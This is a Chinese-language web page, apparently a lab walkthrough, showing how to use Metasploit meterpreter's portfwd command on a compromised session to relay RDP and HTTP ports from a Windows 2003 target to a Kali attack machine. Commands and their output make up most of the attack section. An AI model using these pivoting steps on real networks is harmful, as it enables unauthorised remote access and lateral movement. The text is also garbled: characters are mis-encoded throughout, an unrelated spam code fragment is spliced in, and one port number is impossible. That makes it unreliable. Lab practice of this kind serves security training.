您好,登錄后才能下訂單哦!
Portfwd是一款強(qiáng)大的端口轉(zhuǎn)發(fā)工具,支持TCP,UDP,支持IPV4--IPV6的轉(zhuǎn)換轉(zhuǎn)發(fā)。 并且內(nèi)置于meterpreter。 其中exe單版本源碼如下:
https://github.com/rssnsj/portfwd
復(fù)現(xiàn)過(guò)程
攻擊機(jī): 192.168.1.5 Debian(Kali)
靶 機(jī): 192.168.1.4 Windows7
192.168.1.119 Windows 2003
Sessions -l查看所有msf的連接,看到一條連接到windows 03通信,是從192.168.1.1:455303到192.168.1.119:53
session -l 查看會(huì)話
靶機(jī)IP為:192.168.1.119---windows 2003---x64
function(){ //外匯跟單www.gendan5.com
需要轉(zhuǎn)發(fā)端口為:80,3389
選擇連接中的1號(hào),就一條所以就只能選這個(gè)了
Portfwd -h查看用法
攻擊執(zhí)行
1 meterpreter > portfwd add ‐ l 33389 ‐ r 192.168.1.119 ‐ p 3389
2 [ * ] Local TCP relay created: : 33389 <‐> 192.168.1.119 : 3389
3 meterpreter > portfwd add ‐ l 30080 ‐ r 192.168.1.119 ‐ p 80
4 [ * ] Local TCP relay created: : 30080 <‐> 192.168.1.119 : 80
5 meterpreter > portfwd
6 Index Local RemoteDirection
7 1 0.0.0.0 : 33389 192.168.1.119 : 3389 Forward
8 2 0.0.0.0 : 30080 192.168.1.119 : 80 Forward
9 2 total active port forwards .
成功
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。